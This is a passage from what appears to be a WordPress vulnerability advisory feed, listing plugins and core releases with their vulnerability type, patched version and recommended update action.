Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.5.6
Recommended Action: Update to version 3.5.6, or a newer patched version

Plugin: WordPress Infinite Scroll – Ajax Load More

Vulnerability: Ajax Load More <= 5.6.0.2
Patched Version: 5.6.0.3
Recommended Action: Update to version 5.6.0.3, or a newer patched version

Plugin: Contact Form Email

Vulnerability: Missing Authorization to Feedback Submission
Patched Version: 1.3.32
Recommended Action: Update to version 1.3.32, or a newer patched version

Plugin: Broadcast Live Video – Live Streaming : HTML5, WebRTC, HLS, RTSP, RTMP

Vulnerability: Full Path Disclosure
Patched Version: 4.29.5
Recommended Action: Update to version 4.29.5, or a newer patched version

Plugin: WP Inventory Manager

Vulnerability: Cross-Site Request Forgery via delete_item
Patched Version: 2.1.0.14
Recommended Action: Update to version 2.1.0.14, or a newer patched version

Plugin: Social Hashtags

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Wholesale Market for WooCommerce

Vulnerability: Unauthenticated Arbitrary File Download
Patched Version: 1.0.7
Recommended Action: Update to version 1.0.7, or a newer patched version

Plugin: Gift Up Gift Cards for WordPress and WooCommerce

Vulnerability: Cross-Site Request Forgery via consume_post
Patched Version: 2.22
Recommended Action: Update to version 2.22, or a newer patched version

Plugin: Cookie Notice & Compliance for GDPR / CCPA

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via ‘cookies_policy_link’ Shortcodes
Patched Version: 2.4.7
Recommended Action: Update to version 2.4.7, or a newer patched version

Plugin: Health Check & Troubleshooting

Vulnerability: Path Traversal
Patched Version: 1.2.4
Recommended Action: Update to version 1.2.4, or a newer patched version

Plugin: MashShare – Social Media Share Buttons, Social Share Icons

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via shortcode
Patched Version: 3.8.7
Recommended Action: Update to version 3.8.7, or a newer patched version

Plugin: Woody code snippets – Insert Header Footer Code, AdSense Ads

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.4.6
Recommended Action: Update to version 2.4.6, or a newer patched version

Plugin: Simple Membership

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.2.9
Recommended Action: Update to version 3.2.9, or a newer patched version

Plugin: WP Chinese Conversion

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: All-In-One Security (AIOS) – Security and Firewall

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.2.0
Recommended Action: Update to version 4.2.0, or a newer patched version

Plugin: Short URL

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: All-in-One WP Migration and Backup

Vulnerability: Missing Authorization to Database Export
Patched Version: 2.0.5
Recommended Action: Update to version 2.0.5, or a newer patched version

Plugin: MapGeo – Interactive Geo Maps

Vulnerability: Authenticated (Editor+) Stored Cross-Site Scripting
Patched Version: 1.5.11
Recommended Action: Update to version 1.5.11, or a newer patched version

Plugin: Parcel Pro

Vulnerability: Open Redirect via ‘redirect’
Patched Version: 1.6.12
Recommended Action: Update to version 1.6.12, or a newer patched version

Plugin: Newsletter – Send awesome emails from WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 6.8.2
Recommended Action: Update to version 6.8.2, or a newer patched version

Plugin: Qwizcards | online quizzes and flashcards

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.62
Recommended Action: Update to version 3.62, or a newer patched version

Plugin: Perfmatters

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.1.7
Recommended Action: Update to version 2.1.7, or a newer patched version

Plugin: Pricing Table Builder – AP Pricing Tables Lite

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.5
Recommended Action: Update to version 1.1.5, or a newer patched version

Plugin: Content Filter – Censor All Offensive Content From Your Site

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.1.0
Recommended Action: Update to version 3.1.0, or a newer patched version

Plugin: FunnelKit Checkout

Vulnerability: Authenticated (Subscriber+) Missing Authorization to Settings Change
Patched Version: 3.11.0
Recommended Action: Update to version 3.11.0, or a newer patched version

Plugin: Webcam Video Conference

Vulnerability: Cross-Site Scripting
Patched Version: 4.51
Recommended Action: Update to version 4.51, or a newer patched version

Plugin: Portfolio Gallery – Responsive Image Gallery

Vulnerability: Missing Authorization via Multiple AJAX actions
Patched Version: 1.4.7
Recommended Action: Update to version 1.4.7, or a newer patched version

Plugin: Appointment Booking Calendar — Simply Schedule Appointments Booking Plugin

Vulnerability: Unauthenticated Sensitive Information Exposure
Patched Version: 1.5.7.7
Recommended Action: Update to version 1.5.7.7, or a newer patched version

Plugin: Event Geek

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: SAML Single Sign On – SSO Login

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.9.21
Recommended Action: Update to version 4.9.21, or a newer patched version

Plugin: DX Delete Attached Media

Vulnerability: Cross-Site Request Forgery via add_to_base
Patched Version: 2.0.6
Recommended Action: Update to version 2.0.6, or a newer patched version

Plugin: Photo Gallery, Sliders, Proofing and Themes – NextGEN Gallery

Vulnerability: Unrestricted File Upload
Patched Version: 2.1.15
Recommended Action: Update to version 2.1.15, or a newer patched version

Plugin: Booster for WooCommerce

Vulnerability: Reflected Cross-Site Scripting in PDF Invoicing Module
Patched Version: 5.4.9
Recommended Action: Update to version 5.4.9, or a newer patched version

Plugin: Rencontre – Dating Site

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.2.3
Recommended Action: Update to version 3.2.3, or a newer patched version

Plugin: JS Help Desk – The Ultimate Help Desk & Support Plugin

Vulnerability: Authenticated (Subscriber+) Insecure Direct Object Reference
Patched Version: 2.7.8
Recommended Action: Update to version 2.7.8, or a newer patched version

Plugin: Integration of Moneybird for WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Material Design for Contact Form 7

Vulnerability: Missing Authorization to Arbitrary Settings Update
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: FeedWordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2022.0123
Recommended Action: Update to version 2022.0123, or a newer patched version

Plugin: The Plus Addons for Elementor Page Builder

Vulnerability: Authenticated (Contributor+) Privilege Escalation
Patched Version: 4.1.10
Recommended Action: Update to version 4.1.10, or a newer patched version

Plugin: Testimonial Rotator

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Page Loading Effects

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 3.0.0
Recommended Action: Update to version 3.0.0, or a newer patched version

Plugin: Simple Ads Manager

Vulnerability: Denial of Service
Patched Version: 2.9.4.116
Recommended Action: Update to version 2.9.4.116, or a newer patched version

Plugin: WP-Invoice – Web Invoice and Billing

Vulnerability: Missing Authorization
Patched Version: 4.1.1
Recommended Action: Update to version 4.1.1, or a newer patched version

Plugin: Shortcodes by Angie Makes

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 2.07
Recommended Action: Update to version 2.07, or a newer patched version

Plugin: Watu Quiz

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 3.3.8.3
Recommended Action: Update to version 3.3.8.3, or a newer patched version

Plugin: Ajax Search Pro

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: 4.19
Recommended Action: Update to version 4.19, or a newer patched version

Plugin: CodeBard's Patron Button and Widgets for Patreon

Vulnerability: Reflected Cross-Site Scripting via cb_p6_tab
Patched Version: 2.2.0
Recommended Action: Update to version 2.2.0, or a newer patched version

Plugin: User Activity Log Pro

Vulnerability: Tracking Bypass via IP Spoofing
Patched Version: 2.3.4
Recommended Action: Update to version 2.3.4, or a newer patched version

Plugin: Mass Pages/Posts Creator

Vulnerability: Missing Authorization
Patched Version: 1.2.3
Recommended Action: Update to version 1.2.3, or a newer patched version

Plugin: Chained Quiz

Vulnerability: Cross-Site Request Forgery to Question Deletion
Patched Version: 1.3.2.5
Recommended Action: Update to version 1.3.2.5, or a newer patched version

Plugin: wordpress vertical image slider plugin

Vulnerability: Cross-Site Scripting
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: Visual CSS Style Editor

Vulnerability: Reflected Cross-Site Scripting via liveLink
Patched Version: 7.5.9
Recommended Action: Update to version 7.5.9, or a newer patched version

Plugin: Check & Log Email – Easy Email Testing & Mail logging

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.6
Recommended Action: Update to version 1.0.6, or a newer patched version

Plugin: WP Visitor Statistics (Real Time Traffic)

Vulnerability: SQL Injection
Patched Version: 4.8
Recommended Action: Update to version 4.8, or a newer patched version

Plugin: Custom 404 Pro

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.7.2
Recommended Action: Update to version 3.7.2, or a newer patched version

Plugin: Google Forms

Vulnerability: Remote Code Execution
Patched Version: 0.94
Recommended Action: Update to version 0.94, or a newer patched version

Plugin: WP Last Modified Info

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.6.6
Recommended Action: Update to version 1.6.6, or a newer patched version

Plugin: TWChat – Send or receive messages from users

Vulnerability: Authenticated (Admin+) Local File Inclusion
Patched Version: 3.1.5
Recommended Action: Update to version 3.1.5, or a newer patched version

Plugin: WP Colorbox

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.1.5
Recommended Action: Update to version 1.1.5, or a newer patched version

Plugin: Advanced Page Visit Counter – Most Wanted Analytics Plugin for WordPress

Vulnerability: Subscriber+ Blind SQL Injection
Patched Version: 6.1.6
Recommended Action: Update to version 6.1.6, or a newer patched version

Plugin: Ocim MP3

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Post Rating

Vulnerability: Missing Authorization to Vote Manipulation
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Contact Form Email

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.3.25
Recommended Action: Update to version 1.3.25, or a newer patched version

Plugin: Download Monitor

Vulnerability: Admin+ SQL Injection via orderby parameter
Patched Version: 4.4.5
Recommended Action: Update to version 4.4.5, or a newer patched version

Plugin: Cyclone Slider

Vulnerability: Authenticated (Admin+) Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Login/Signup Popup ( Inline Form + Woocommerce )

Vulnerability: Missing Authorization
Patched Version: 1.5
Recommended Action: Update to version 1.5, or a newer patched version

Plugin: MapPress Maps for WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.73.4
Recommended Action: Update to version 2.73.4, or a newer patched version

Plugin: Anchor Episodes Index (Spotify for Podcasters)

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 2.1.8
Recommended Action: Update to version 2.1.8, or a newer patched version

Plugin: fgallery

Vulnerability: SQL Injection
Patched Version: 2.4.2
Recommended Action: Update to version 2.4.2, or a newer patched version

Plugin: Gwolle Guestbook

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.1.1
Recommended Action: Update to version 2.1.1, or a newer patched version

Plugin: AdRotate Banner Manager – The only ad manager you'll need

Vulnerability: SQL Injection
Patched Version: 3.6.8
Recommended Action: Update to version 3.6.8, or a newer patched version

Plugin: Testimonial

Vulnerability: SQL Injection
Patched Version: 2.3
Recommended Action: Update to version 2.3, or a newer patched version

Plugin: Import any XML, CSV or Excel File to WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 3.4.6
Recommended Action: Update to version 3.4.6, or a newer patched version

Plugin: Analytify – Google Analytics Dashboard For WordPress (GA4 analytics made easy)

Vulnerability: Missing Authorization to Opt-In
Patched Version: 5.1.1
Recommended Action: Update to version 5.1.1, or a newer patched version

Plugin: OptionTree

Vulnerability: Cross-Site Scripting
Patched Version: 2.5.4
Recommended Action: Update to version 2.5.4, or a newer patched version

Plugin: Order Delivery Date for WooCommerce

Vulnerability: Reflected Cross-Site Scripting via ‘orddd_lite_custom_startdate’ and ‘orddd_lite_custom_enddate’
Patched Version: 3.20.1
Recommended Action: Update to version 3.20.1, or a newer patched version

Plugin: FV Flowplayer Video Player

Vulnerability: Unauthenticated SQL Injection
Patched Version: 7.3.15.727
Recommended Action: Update to version 7.3.15.727, or a newer patched version

Plugin: Wholesale Suite – WooCommerce Wholesale Prices, B2B, Catalog Mode, Order Form, Wholesale User Roles, Dynamic Pricing & More

Vulnerability: Authenticated (Subscriber+) Cross-Site Scripting
Patched Version: 2.1.5.1
Recommended Action: Update to version 2.1.5.1, or a newer patched version

Plugin: Foyer – Digital Signage for WordPress

Vulnerability: Content Injection via Improper Access Control
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WPFront Notification Bar

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 2.1.0
Recommended Action: Update to version 2.1.0, or a newer patched version

Plugin: google-adsense-and-hotel-booking

Vulnerability: Open Proxy
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Multiple Cross-Site Request Forgery Issues
Patched Version: 2.0.7
Recommended Action: Update to version 2.0.7, or a newer patched version

Plugin: Feed Them Social – Social Media Feeds, Video, and Photo Galleries

Vulnerability: Cross-Site Request Forgery to Settings update
Patched Version: 3.0.1
Recommended Action: Update to version 3.0.1, or a newer patched version

Plugin: Bootstrap Shortcodes

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Google AdSense Click-Fraud Monitoring Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WordPress Meta Robots

Vulnerability: SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Sloth Logo Customizer

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Preloader Matrix

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: accesspress-anonymous-post-pro

Vulnerability: Unauthenticated Arbitrary File Upload
Patched Version: 3.2.0
Recommended Action: Update to version 3.2.0, or a newer patched version

Plugin: Media from FTP

Vulnerability: Authenticated (Author+) Improper Privilege Management
Patched Version: 11.17
Recommended Action: Update to version 11.17, or a newer patched version

Plugin: Payment Gateways Caller for WP e-Commerce

Vulnerability: Local File Inclusion
Patched Version: 0.1.1
Recommended Action: Update to version 0.1.1, or a newer patched version

Plugin: Activity Log – Monitor & Record User Changes

Vulnerability: Full Path Disclosure
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: Download Manager

Vulnerability: Open Redirect
Patched Version: 2.9.51
Recommended Action: Update to version 2.9.51, or a newer patched version

Plugin: Parallax Scroll by adamrob.co.uk

Vulnerability: Cross-Site Scripting
Patched Version: 2.1
Recommended Action: Update to version 2.1, or a newer patched version

Plugin: Awesome Support – WordPress HelpDesk & Support Plugin

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 6.0.8
Recommended Action: Update to version 6.0.8, or a newer patched version

Plugin: Mail Masta

Vulnerability: SQL Injection via filter_list
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: CPO Shortcodes

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Meta SEO

Vulnerability: Missing Authorization in ‘listPostsCategory’
Patched Version: 4.5.4
Recommended Action: Update to version 4.5.4, or a newer patched version

Plugin: Multi Rating

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 5.0.6
Recommended Action: Update to version 5.0.6, or a newer patched version

Plugin: Quick Restaurant Menu

Vulnerability: Missing Authorization
Patched Version: 2.1.0
Recommended Action: Update to version 2.1.0, or a newer patched version

Plugin: FULL – Cliente

Vulnerability: Customer <= 2.2.3
Patched Version: 2.3
Recommended Action: Update to version 2.3, or a newer patched version

Plugin: mb.miniAudioPlayer – an HTML5 audio player for your mp3 files

Vulnerability: Cross-Site Scripting
Patched Version: 1.4.3
Recommended Action: Update to version 1.4.3, or a newer patched version

Plugin: OnionBuzz

Vulnerability: SQL Injection
Patched Version: 1.2.7
Recommended Action: Update to version 1.2.7, or a newer patched version

Core: WordPress

Vulnerability: Timing Side-Channel Attack
Patched Version: 3.7.10
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.10, 3.8.10, 3.9.8, 4.0.7, 4.1.7, 4.2.4

Plugin: My Calendar – Accessible Event Manager

Vulnerability: Cross-Site Scripting
Patched Version: 1.10.5
Recommended Action: Update to version 1.10.5, or a newer patched version

Plugin: Loading Page with Loading Screen

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.83
Recommended Action: Update to version 1.0.83, or a newer patched version

Plugin: dhtmlxspreadsheet

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Easy2Map

Vulnerability: Directory Traversal
Patched Version: 1.2.5
Recommended Action: Update to version 1.2.5, or a newer patched version

Plugin: real.Kit

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 5.1.1
Recommended Action: Update to version 5.1.1, or a newer patched version

Plugin: WP Pro Real Estate 7

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.1.1
Recommended Action: Update to version 3.1.1, or a newer patched version

Plugin: 博客社交分享组件

Vulnerability: Cross-Site Request Forgery to Settings Update
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Easy Social Icons

Vulnerability: Admin+ SQL Injection
Patched Version: 3.1.4
Recommended Action: Update to version 3.1.4, or a newer patched version

Plugin: Custom Options Plus

Vulnerability: Cross-Site Request Forgery via custom_options_plus_adm
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: The Plus Addons for Elementor Page Builder

Vulnerability: Open Redirect
Patched Version: 4.1.10
Recommended Action: Update to version 4.1.10, or a newer patched version

Plugin: Fixedly Media Gallery

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Cross-Site Request Forgery to Form Duplication
Patched Version: 2.6.1
Recommended Action: Update to version 2.6.1, or a newer patched version

Plugin: Passster – Password Protect Pages and Content

Vulnerability: Insecure Password Storage to Sensitive Data Exposure
Patched Version: 3.5.5.5.2
Recommended Action: Update to version 3.5.5.5.2, or a newer patched version

Plugin: Shared Files – Frontend File Upload Form & Secure File Sharing

Vulnerability: Cross-Site Scripting
Patched Version: 1.6.61
Recommended Action: Update to version 1.6.61, or a newer patched version

Plugin: RentPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Spotlight

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Photo Album Plus

Vulnerability: Cross-Site Scripting
Patched Version: 6.1.3
Recommended Action: Update to version 6.1.3, or a newer patched version

Plugin: White Label CMS

Vulnerability: Cross-Site Scripting
Patched Version: 1.5.1
Recommended Action: Update to version 1.5.1, or a newer patched version

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.3.29
Recommended Action: Update to version 1.3.29, or a newer patched version

Plugin: Jupiter X Core

Vulnerability: Unauthenticated Arbitrary File Upload
Patched Version: 3.3.8
Recommended Action: Update to version 3.3.8, or a newer patched version

Plugin: Easy Digital Downloads – Attach Accounts to Orders

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.2
Recommended Action: Update to version 2.0.2, or a newer patched version

Plugin: WP Print Friendly

Vulnerability: Cross-Site Scripting
Patched Version: 0.6.1
Recommended Action: Update to version 0.6.1, or a newer patched version

Plugin: Booster for WooCommerce

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 7.1.1
Recommended Action: Update to version 7.1.1, or a newer patched version

Plugin: TextMe SMS

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.8.9
Recommended Action: Update to version 1.8.9, or a newer patched version

Plugin: Google Doc Embedder

Vulnerability: Directory Traversal
Patched Version: 2.5.4
Recommended Action: Update to version 2.5.4, or a newer patched version

Plugin: Theme Editor

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.2
Recommended Action: Update to version 2.2, or a newer patched version

Plugin: Booking Manager – Sync WP Booking Calendar – Import Events, Export Bookings to ICS Calendar

Vulnerability: Authenticated (Contributor+) SQL Injection via Shortcode
Patched Version: 2.1.6
Recommended Action: Update to version 2.1.6, or a newer patched version

Plugin: WP Booking Calendar

Vulnerability: Cross-Site Request Forgery
Patched Version: 9.2.2
Recommended Action: Update to version 9.2.2, or a newer patched version

Plugin: ARMember – Membership Plugin, Content Restriction, Member Levels, User Profile & User signup

Vulnerability: No subtitle
Patched Version: 3.4.8
Recommended Action: Update to version 3.4.8, or a newer patched version

Plugin: Strong Testimonials

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.40.1
Recommended Action: Update to version 2.40.1, or a newer patched version

Plugin: Potent Donations for WooCommerce

Vulnerability: Cross-Site Request Forgery in hm_wcdon_admin_page
Patched Version: 1.1.10
Recommended Action: Update to version 1.1.10, or a newer patched version

Plugin: Gallery Plugin for WordPress – Envira Photo Gallery

Vulnerability: Cross-Site Scripting
Patched Version: 1.8.3.3
Recommended Action: Update to version 1.8.3.3, or a newer patched version

Plugin: Page-list

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 5.3
Recommended Action: Update to version 5.3, or a newer patched version

Plugin: Photo Gallery, Images, Slider in Rbs Image Gallery

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.2.16
Recommended Action: Update to version 3.2.16, or a newer patched version

Plugin: World of Warcraft – Armory Table

Vulnerability: Cross-Site Scripting
Patched Version: 0.2.6
Recommended Action: Update to version 0.2.6, or a newer patched version

Plugin: AMP for WP – Accelerated Mobile Pages

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via shortcode
Patched Version: 1.0.89
Recommended Action: Update to version 1.0.89, or a newer patched version

Plugin: Add Custom Body Class

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Time Sheets

Vulnerability: Cross-Site Scripting
Patched Version: 1.5.2
Recommended Action: Update to version 1.5.2, or a newer patched version

Plugin: Cost of Goods: Product Cost & Profit Calculator for WooCommerce

Vulnerability: Missing Authorization in save_costs
Patched Version: 2.8.7
Recommended Action: Update to version 2.8.7, or a newer patched version

Plugin: BuddyPress BP Gallery Plus

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: DW Question & Answer

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Request a Quote

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.3.11
Recommended Action: Update to version 2.3.11, or a newer patched version

Plugin: WP Maps – Display Google Maps Perfectly with Ease

Vulnerability: Authenticated (Editor+) Stored Cross-Site Scripting
Patched Version: 4.4.0
Recommended Action: Update to version 4.4.0, or a newer patched version

Plugin: Booster for WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.5.9
Recommended Action: Update to version 5.5.9, or a newer patched version

Plugin: Breadcrumbs Shortcode

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.45
Recommended Action: Update to version 1.45, or a newer patched version

Plugin: Simple Custom Author Profiles

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Welcome Bar

Vulnerability: Missing Authorization
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: Simple Light Weight Social Share (Tweet, Like, Share and Linkedin)

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Require & Limit Categories, Tags, Featured Image and taxonomies

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.27
Recommended Action: Update to version 1.27, or a newer patched version

Plugin: All-in-One Addons for Elementor – WidgetKit

Vulnerability: WidgetKit <= 2.4.3
Patched Version: 2.4.4
Recommended Action: Update to version 2.4.4, or a newer patched version

Plugin: LearnPress – WordPress LMS Plugin

Vulnerability: Unauthenticated SQL Injection
Patched Version: 4.2.0
Recommended Action: Update to version 4.2.0, or a newer patched version

Plugin: WP Like Button

Vulnerability: Cross-Site Request Forgery via ‘saveData’
Patched Version: 1.7.0
Recommended Action: Update to version 1.7.0, or a newer patched version

Plugin: Sensei LMS – Online Courses, Quizzes, & Learning

Vulnerability: Information Disclosure
Patched Version: 4.5.0
Recommended Action: Update to version 4.5.0, or a newer patched version

Plugin: Jetpack CRM – Clients, Leads, Invoices, Billing, Email Marketing, & Automation

Vulnerability: Cross-Site Request Forgery and PHAR Deserialization
Patched Version: 5.4.0
Recommended Action: Update to version 5.4.0, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting via Taxonomy names
Patched Version: 3.7.19
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.19, 3.8.19, 3.9.17, 4.0.16, 4.1.16, 4.2.13, 4.3.9, 4.4.8, 4.5.7, 4.6.4, 4.7.3

Plugin: Affiliates Manager

Vulnerability: Admin+ SQL Injection
Patched Version: 2.8.7
Recommended Action: Update to version 2.8.7, or a newer patched version

Plugin: Store Locator for WordPress with Google Maps – LotsOfLocales

Vulnerability: Cross-Site Request Forgery to Settings Update
Patched Version: 3.98.8
Recommended Action: Update to version 3.98.8, or a newer patched version

Plugin: Pixel Cat – Conversion Pixel Manager

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.6.4
Recommended Action: Update to version 2.6.4, or a newer patched version

Plugin: Analytics Cat – Google Analytics Made Easy

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: MakeStories (for Google Web Stories)

Vulnerability: Cross-Site Scripting
